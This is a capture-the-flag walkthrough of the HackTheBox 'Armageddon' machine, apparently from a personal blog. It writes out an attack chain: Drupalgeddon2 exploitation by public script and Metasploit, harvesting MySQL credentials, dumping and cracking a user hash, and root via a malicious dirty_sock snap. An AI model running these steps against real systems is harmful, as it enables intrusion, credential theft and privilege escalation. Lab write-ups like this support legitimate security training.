HackTheBox: (“Armageddon”) — Walkthrough
Hi People :D
Today we gonna solve “Armageddon” machine from HackTheBox, an easy machine that focuses on Drupal exploitation and snap privilege escalation, let’s get started :D
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.233
We have two open ports (22/80) and we know from the results that the website on port 80 running Drupal 7, so let’s navigate to it
Web Enumeration
— — — — — — — —
We have a simple register&login function but we can’t create a new account because the e-mail cannot be sent as the website says: “Unable to send e-mail …”
Let’s move to the next step.. fuzzing directories.
We have a lot of files but /profiles/testing/testing.info is the most important one ( I used the Dirsearch tool to perform the fuzzing process )
./dirsearch -u http://10.10.10.233/ -e "*" -i 200
In the testing.info file, we have the exact version of Drupal (“7.56”) and now we can make sure that the website running Drupal 7.56
Drupal is a free and open-source web content management framework written in PHP ( more information Here ).
Let’s search for exploitation, I found This GitHub Repo that contains an automatic exploitation script
Exploitation
— — — — — —
Let’s download this repo using:
git clone https://github.com/dreadlocked/Drupalgeddon2.gitcd Drupalgeddon2/
Then run the script using:
./drupalgeddon2.rb http://10.10.10.233/
And we easily got an apache user shell ☺
OR you can use This Metasploit Module
First use the module then set the options for it:
use exploit/unix/webapp/drupal_drupalgeddon2set RHOSTS 10.10.10.223set LHOST tun0
exploit
We got an apache user shell from Metasploit successfully ☺
User Flag
— — — — —
After you get the apache shell, move to /var/www/html/sites/default directory, there are two PHP scripts that have a drupaluser credentials ( drupaluser:CQHEy@9M*m23gBVj
)
You can grep for these creds using:
cat * | grep username && cat * | grep password
These creds work with MySQL database, so let’s try to find any passwords or hashes.
First, login to MySQL service using:
mysql -u drupaluser -h localhost -p CQHEy@9M*m23gBVj
Then list all databases using:
SHOW DATABASES;
show;
Second, use the drupal database with use drupal;
, then list all tables using:
SHOW TABLES;
show;
We have a users table which probably contains the user's hashes
The last step is to dumb the users table contains using:
select * from users;
show;
There’s the brucetherealadmin hash in the users table ( $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
)
Let’s try to crack this hash, first put the hash into a file called hash then use the john tool with rockyou wordlist to start the cracking process
Wait for the tool to finish the cracking process then execute john hash --show
to see the result.
The hash successfully cracked and the password is booboo
We can now SSH into brucetherealadmin using:
ssh brucetherealadmin@10.10.10.233
pass: booboo
And we finally found the user flag ☺
Root Flag
— — — — —
Execute sudo-l
command, you’ll see that you can run snap install as root without password and the machine is running snap 2.47.1–1.el7
After some searching, I found This GitHub Repo that talks about exploiting privilege escalation using snap by installing an empty devmode snap that adds a new user to the local system, this user will have permissions to execute sudo commands
We gonna use only the trojan part from dirty_sockv2.py.
But before we use it, we must know what it does first, right? It’s encoded by Base64 so let’s decode It
It’s adding a new user called dirty_sock with his hash using useradd
and makes it one of the Sudoers by using usermod
and gives him full permission with the echo
command, the rest of the data is required for the snap package.
Now let’s copy this trojan and remove all spaces from it then put it into a file called exp.snap after decoding it using python and piping as following:
Run this command on the machine and execute sudo /usr/bin/snap install --devmode exp.snap
Now we’ve successfully installed the snap package so let’s see if it works, run su dirty_sock
it will ask for a password and it’s dirty_sock
Then run sudo -i
command and write the password again ( dirty_sock
), you’ll get the root privilege and you can easily get the root flag ☺
Thanks for reading and I hope you love this writeup ❤.
You can give me a Respect on my HackTheBox Account (if you want :D).